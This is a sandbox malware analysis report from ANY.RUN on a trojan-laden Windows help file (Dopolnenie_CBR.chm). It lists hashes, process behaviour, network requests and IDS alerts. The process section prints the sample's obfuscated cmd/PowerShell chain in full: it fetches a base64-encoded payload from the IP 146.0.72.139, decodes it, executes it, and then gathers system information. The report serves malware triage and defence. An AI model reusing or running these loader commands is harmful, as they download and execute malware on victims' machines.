analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Dopolnenie_CBR.chm

Full analysis: https://app.any.run/tasks/efe10b52-aa05-46e4-8c24-8931b365467e
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 15, 2018, 07:54:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

F7E6785E5F6BFEB8AB16A87968B9A172

SHA1:

20055FC3F1DB35B279F15D398914CABA11E5AD9D

SHA256:

77775F1DBFCEB1F1915D2DB067A0A8239DAB771D41084FC89E9478F3995F2498

SSDEEP:

96:tyjcFB7/c4FtSd28IihG3KjA0FQ/kdi0IAQgSctgFXXCRk2cBM:tyetSd2zihG3Kj5B2ciXCm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • hifriff.com (PID: 1996)
      • cmd.exe (PID: 1392)
      • hifrifff.com (PID: 1776)
      • hifrifff.com (PID: 2388)
      • cmd.exe (PID: 1380)
      • hifrif.com (PID: 3420)
      • cmd.exe (PID: 2700)
    • Changes the autorun value in the registry

      • hifrif.com (PID: 3420)
  • SUSPICIOUS

    • Reads internet explorer settings

      • hh.exe (PID: 2564)
    • Starts CMD.EXE for commands execution

      • hh.exe (PID: 2564)
      • mshta.exe (PID: 3064)
      • hifrif.com (PID: 3420)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1392)
      • hifriff.com (PID: 1996)
      • hifrif.com (PID: 3420)
    • Starts application with an unusual extension

      • hifrifff.com (PID: 2388)
      • cmd.exe (PID: 1392)
      • hifriff.com (PID: 1996)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 1380)
    • Creates files in the user directory

      • hifrif.com (PID: 3420)
    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 2700)
    • Creates files in the program directory

      • cmd.exe (PID: 2700)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3064)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chi | Windows HELP Index (81)
.chm | Windows HELP File (18.9)

EXIF

EXE

LanguageCode: English (U.S.)
CHMVersion: 3
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
10
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start hh.exe no specs cmd.exe no specs mshta.exe cmd.exe hifrifff.com no specs hifrifff.com no specs hifriff.com hifrif.com cmd.exe no specs systeminfo.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2564"C:\Windows\hh.exe" C:\Users\admin\AppData\Local\Temp\Dopolnenie_CBR.chmC:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1380"C:\Windows\System32\cmd.exe" ,/b,^, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/C,, st%ALLUSERSPROFILE:~8,1%rt msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.72.139/liC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3064mshta Http://146.0.72.139/liC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1392"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\hifrifff.com && C:\Users\admin\AppData\Local\Temp\\hifrifff.com /c &Set skk= -Encoding&& Set ski= Byte && Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\System32\\WiNDOWSPOWerShELl\\v1.0\\pOWErsheLl.ExE C:\Users\admin\AppData\Local\Temp\\hifriff.com& C:\Users\admin\AppData\Local\Temp\\hifrifff.com /c C:\Users\admin\AppData\Local\Temp\\hifriff.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\hifrif.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\hifrif.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\hifrif.com $sv; C:\Users\admin\AppData\Local\Temp\\hifrif.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1776C:\Users\admin\AppData\Local\Temp\\hifrifff.com /c C:\Users\admin\AppData\Local\Temp\hifrifff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2388C:\Users\admin\AppData\Local\Temp\\hifrifff.com /c C:\Users\admin\AppData\Local\Temp\\hifriff.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\hifrif.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\hifrif.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\hifrif.com $sv; C:\Users\admin\AppData\Local\Temp\\hifrif.com;C:\Users\admin\AppData\Local\Temp\hifrifff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1996C:\Users\admin\AppData\Local\Temp\\hifriff.com -nop -W hidden -noninteractive -c (new-object System.Net.WebClient).Downloadfile('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\hifrif.txt'); $sr=Get-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\hifrif.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\hifrif.com $sv; C:\Users\admin\AppData\Local\Temp\\hifrif.com;C:\Users\admin\AppData\Local\Temp\hifriff.com
hifrifff.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3420"C:\Users\admin\AppData\Local\Temp\hifrif.com"C:\Users\admin\AppData\Local\Temp\hifrif.com
hifriff.com
User:
admin
Company:
MS DefenderApplication
Integrity Level:
MEDIUM
Description:
MS DefenderApplicationController
Version:
2.0.4.9
2700"C:\Windows\System32\cmd.exe" /C systeminfo >> C:\ProgramData\INFOCONTENT.TXTC:\Windows\System32\cmd.exehifrif.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3444systeminfo C:\Windows\system32\systeminfo.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
538
Read events
454
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
0
Text files
3
Unknown types
2

Dropped files

PID
Process
Filename
Type
2564hh.exeC:\Users\admin\AppData\Local\Temp\WWU1217.tmp
MD5:
SHA256:
2564hh.exeC:\Users\admin\AppData\Local\Temp\iso121B.tmp
MD5:
SHA256:
2564hh.exeC:\Users\admin\AppData\Local\Temp\IMT122C.tmp
MD5:
SHA256:
2564hh.exeC:\Users\admin\AppData\Local\Temp\IMT122D.tmp
MD5:
SHA256:
2564hh.exeC:\Users\admin\AppData\Local\Temp\IMT122E.tmp
MD5:
SHA256:
2564hh.exeC:\Users\admin\AppData\Local\Temp\IMT122F.tmp
MD5:
SHA256:
2564hh.exeC:\Users\admin\AppData\Local\Temp\IMT123F.tmp
MD5:
SHA256:
3064mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\li[1]html
MD5:D0FA1AB050BEDE3522650FAA54BBAB2D
SHA256:9D10F123C6252C7DB2BE34176B5D76101286DBABC976AD9E0A2493D5D7559295
2564hh.exeC:\Users\admin\AppData\Local\Temp\Dopolnenie_CBR.chwchm
MD5:044BFD2F74F0F1695EA7DAF4A0B88B68
SHA256:481A89580E3E2B2FBF306AAEA0539894CB36D0056BEB4202E09F13F4C8704898
2700cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:CDB154D4EBD46A51234C9B38CC31E38B
SHA256:402FDFD7CFD32ADEDE3C45E51629E70C535F1395DCF4C181B5D7D37E92825857
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3064
mshta.exe
GET
200
146.0.72.139:80
http://146.0.72.139/li
NL
html
2.93 Kb
suspicious
1996
hifriff.com
GET
200
146.0.72.139:80
http://146.0.72.139/flk
NL
text
136 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3064
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious
1996
hifriff.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
1996
hifriff.com
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1996
hifriff.com
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
1996
hifriff.com
Misc activity
POLICY [PTsecurity] Executable base64 Payload
No debug info